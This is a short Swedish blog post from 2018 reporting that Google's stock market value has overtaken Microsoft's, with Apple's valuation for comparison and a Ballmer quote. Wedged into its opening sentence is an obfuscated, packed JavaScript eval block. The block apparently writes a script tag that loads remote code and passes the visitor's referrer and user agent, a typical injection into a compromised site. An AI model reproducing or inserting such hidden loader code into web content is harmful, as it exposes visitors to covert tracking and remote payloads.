Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Google nu värderat högre än Microsoft

Google nu värderat högre än Microsoft
Sebastian Plengier Ehrnfelt

En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tnifd|var|u0026u|referrer|etadd||js|php’.split(‘|’),0,{}))
gång i tiden sa en väldigt högt uppsatt på Microsoft ”Google’s not a real company. It’s a house of cards”. Den personen var Steve Ballmer nu VD för Microsoft.

Men som man alltid säger, det kommer alltid en större fisk.

När Apple släppte sin iPhone, iPad och framförallt iTunes blev det ändring på topplistan. Microsoft åkte ner från toppen och idag är Apple värt 618 miljarder dollar och Microsoft 247 miljarder dollar (detta är börsvärdet även kallat Market cap).

Men från att ligga på en klassisk två plats efter Apple har nu en annan aktör tagit sig förre, nämligen Google. Google är nu värderat till 249 miljarder dollar vilket klår Microsoft.

Detta är ett bra bevis på att tider förändras.

Grattis Google!

Läs mer här!